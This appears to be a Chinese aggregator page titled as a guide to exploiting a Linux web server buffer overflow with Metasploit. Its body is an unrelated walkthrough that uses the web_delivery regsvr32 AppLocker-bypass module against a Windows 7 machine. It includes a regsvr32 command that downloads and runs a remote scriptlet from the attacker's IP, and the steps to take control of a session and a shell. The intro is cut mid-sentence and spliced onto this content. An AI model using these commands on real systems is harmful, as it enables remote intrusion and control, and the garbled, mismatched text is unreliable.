怎么用msf攻击linux环境下web服务器的缓冲区溢出漏洞
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了怎么用msf攻击linux环境下web服务器的缓冲区溢出漏洞相关的知识,希望对你有一定的参考价值。
参考技术A 缓冲区溢出是一种非常普遍、非常危险的漏洞,在各种操作系统、应用软件中广泛存在。利用缓冲区溢出攻击,可以导致程序运行失败、系统当机、重新启动等后果。更为严重的是,msf web_delivery模块攻击
目标机:win7 ip:192.168.31.136
攻击机:kai liunx ip:192.168.31.54
一.使用web_delivery模块的regsvr32_applocker_bypass_server
1.打开神器metasploit,终端输入msfconsole
2.搜索web_delivery模块,search web_delivery
3.使用命令use exploit/windows/misc/regsvr32_applocker_bypass_server,并且查看这个模块选项
4.设置攻击机ip,set lhost 192.168.31.54
5.运行,run或者rexpolit
6.复制生成的regsvr32 /s /n /u /i:http://192.168.31.54:8080/Yos79zYgod.sct scrobj.dll,拿到目标机win7上去运行.
7.回到攻击机kai liunx就可以看到已经成功监听,并返回了一个session
8.输入sessions,查看session内容
9.输入命令sessions -i 1,这样就控制到了目标机了
10.截取当前桌面屏幕,并且去root目录下查看
11.输入shell,来到我们熟悉的界面,随便执行一个命令看看
以上是关于怎么用msf攻击linux环境下web服务器的缓冲区溢出漏洞的主要内容,如果未能解决你的问题,请参考以下文章
利用MSF的MS08_067模块攻击windows server 2003 SP2中文版系统